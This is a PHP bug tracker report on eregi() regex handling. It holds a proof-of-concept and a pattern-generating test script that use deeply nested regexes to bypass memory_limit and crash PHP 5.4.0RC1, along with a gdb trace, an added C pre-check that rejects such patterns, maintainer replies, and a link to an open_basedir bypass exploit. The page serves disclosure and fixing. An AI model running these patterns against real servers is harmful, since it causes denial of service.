Sec Bug #60262 multiple flaws memory_limit bypass, dos, code exec
Submitted: 2011-11-11 11:46 UTC Modified: 2018-12-18 01:27 UTC
From: max at cxib dot net Assigned: stas (profile)
Status: Closed Package: *General Issues
PHP Version: 5.4.0RC1 OS:
Private report: No CVE-ID: None
 [2011-11-11 11:46 UTC] max at cxib dot net
Description:
------------
<?php
/* PoC: memory_limit bypass. Case 1 allocates through the engine and is stopped
   by memory_limit; case 2 hands a deeply nested pattern to eregi(), whose
   regex compiler allocates outside of that limit. */

ini_set("memory_limit","32M");

if($argv[1]==1)
	$sss=str_repeat("A",$argv[2]); // control case: charged against memory_limit
elseif($argv[1]==2)
	eregi("(.?)(((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((.*){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}","a");

?>

Fix:
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/regex/regcomp.c
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/regex/engine.c
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/regex/regex2.h


Test script:
---------------
<?php
/*
Tests the regcomp version bundled in PHP.
Based on the original code at
http://cvsweb.netbsd.org/bsdweb.cgi/src/tests/lib/libc/regex/t_exhaust.c

Running:
cx@cx64:/cxib/source/php-5.4.0RC1/bin/bin$ ulimit -v 1000000
cx@cx64:/cxib/source/php-5.4.0RC1/bin/bin$ ulimit -m 1000000

then run it; the result is:

Program received signal SIGSEGV, Segmentation fault.
memcpy () at ../sysdeps/x86_64/memcpy.S:432
432	../sysdeps/x86_64/memcpy.S: No such file or directory.
	in ../sysdeps/x86_64/memcpy.S

(gdb) x/i $rip
=> 0x7ffff6a7fc69 <memcpy+777>:	mov    %rax,(%rdi)
(gdb) x/x $rax
0x28000002:	Cannot access memory at address 0x28000002
(gdb) x/x $rdi
0x7fffdd79c000:	Cannot access memory at address 0x7fffdd79c000

*/



// Pattern generators, indexed by $argv[1]; $len controls the nesting depth.
function patterns($len){
	return array(
		"(".str_repeat("\(",$len).")", // for p_bre recursion (crash has been fixed)
		"(".str_repeat("\(",60).str_repeat("(.*)",$len).")", // for p_bre recursion (problematic for p_bre len>70000)
		"(.?)".str_repeat("((.*){0,255}",$len).str_repeat(")",$len),
		"(.?)".str_repeat("(.\{0,}",$len).str_repeat(")",$len),
		"(.?)".str_repeat("((.*){1,255}",$len).str_repeat(")",$len),
		"(.?)".str_repeat("(",$len).".*".str_repeat("){1,100}",$len),
		str_repeat("(?:(.*)|",$len)."(.*)".str_repeat(")",$len)
	);
}

// Compile and run one pattern against the single-character subject "a".
function execc($patt){
	eregi($patt,"a");
	return 0;
}

if(isset($argv[1]) and isset($argv[2])){
	// Run a single generator at the given depth.
	$patts=patterns($argv[2]);
	echo $patts[$argv[1]];
	execc($patts[$argv[1]]);
}
else{
	// Sweep all generators, doubling the depth each round.
	for($flen=1;$flen<1000;$flen+=$flen){
		$currpat=patterns($flen);
		for($fl=0;$fl<count($currpat);$fl++) execc($currpat[$fl]);
	}
}


?>
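Added example, not code from the report or from PHP's ext/ereg: a defensive pre-check in C that bounds group nesting and the number of quantified groups in an untrusted POSIX ERE before the pattern reaches regcomp(), and rebuilds the test script's fifth generator ("(.?)" . n*"((.*){1,255}" . n*")") to show such a pattern being refused. The limits 16 and 8 are constructed thresholds, not values from the page.

```c
#include <regex.h>
#include <stdio.h>
#include <stdlib.h>

#define MAX_GROUP_DEPTH        16   /* limits for untrusted patterns; constructed */
#define MAX_QUANTIFIED_GROUPS   8   /* for this example, tune for your own inputs */

/* Scan a POSIX ERE: deepest '(' nesting and number of groups directly followed
 * by a quantifier (* + ? {m,n}). Escapes and bracket expressions are skipped so
 * "\(" and "[()]" are not counted. Returns -1 on unbalanced parens/brackets. */
int ere_complexity(const char *pat, int *max_depth, int *quantified)
{
    int depth = 0;
    *max_depth = *quantified = 0;
    for (const char *p = pat; *p; p++) {
        if (*p == '\\') {                          /* escaped character */
            if (*++p == '\0') return -1;
        } else if (*p == '[') {                    /* bracket expression */
            if (*++p == '^') p++;
            if (*p == ']') p++;                    /* a leading ']' is literal */
            while (*p && *p != ']') p++;
            if (!*p) return -1;
        } else if (*p == '(') {
            if (++depth > *max_depth) *max_depth = depth;
        } else if (*p == ')') {
            if (--depth < 0) return -1;
            if (p[1] == '*' || p[1] == '+' || p[1] == '?' || p[1] == '{') (*quantified)++;
        }
    }
    return depth == 0 ? 0 : -1;
}

/* 0 on success, -1 if the pre-check rejects pat, else the regcomp() error code. */
int safe_regcomp(regex_t *re, const char *pat, int cflags)
{
    int depth, quantified;
    if (ere_complexity(pat, &depth, &quantified) != 0) return -1;
    if (depth > MAX_GROUP_DEPTH || quantified > MAX_QUANTIFIED_GROUPS) return -1;
    return regcomp(re, pat, cflags);
}

/* Rebuild the test script's fifth generator: "(.?)" . n*"((.*){1,255}" . n*")". */
char *nested_pattern(int n)
{
    char *buf = malloc(5 + 13 * (size_t)n), *q = buf + sprintf(buf, "(.?)");
    for (int i = 0; i < n; i++) q += sprintf(q, "((.*){1,255}");
    for (int i = 0; i < n; i++) *q++ = ')';
    *q = '\0';
    return buf;
}
```

The check is syntactic and cheap, so it can sit in front of any regcomp() call that receives caller-supplied patterns; it rejects nested_pattern(100) (depth 101, 100 quantified groups) while a plain e-mail pattern compiles and matches as before.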



History

 [2011-11-21 07:44 UTC] stas@php.net
Note ereg is deprecated since 5.3. Also we probably can't just lift patch from 
NetBSD, will have to port it.
 [2011-11-22 00:54 UTC] max at cxib dot net
That is what I know: eregi() will still be available in 5.4. safe_mode will also be removed, but not in 5.4. Anyway, PHP should guarantee safety. There are people who use safe_mode and there are people who bypass it. suphp is also not safe with symlinks. Is there any alternative for safe mode? Anyway, I may try to fix grep() in php54. Allowing a memory_limit bypass and code execution in line 54 is not a good idea.
 [2011-11-22 01:00 UTC] stas@php.net
Safe mode is actually gone in 5.4 (see UPGRADING in the source), but ereg is 
still available, so I do not deny this needs to be fixed. I just note that the 
use of this function is strongly discouraged in all current PHP versions.
 [2011-11-23 05:19 UTC] max at cxib dot net
You are right, safe_mode is removed. But we still have a problem with open_basedir. In 5.4.0RC1 it is possible to bypass it by:

http://securityreason.com/expldownload/1/7571/1
 [2012-05-13 15:10 UTC] felipe@php.net
-Private report: No +Private report: Yes
 [2017-08-26 12:22 UTC] cmb@php.net
-Assigned To: +Assigned To: stas
 [2017-08-26 12:22 UTC] cmb@php.net
Since ereg() and friends finally have been removed, I think this
ticket can be (dis)closed. Stas?
 [2018-12-18 01:27 UTC] stas@php.net
-Status: Assigned +Status: Closed
 
PHP Copyright © 2001-2019 The PHP Group
All rights reserved.
Last updated: Fri May 24 21:01:26 2019 UTC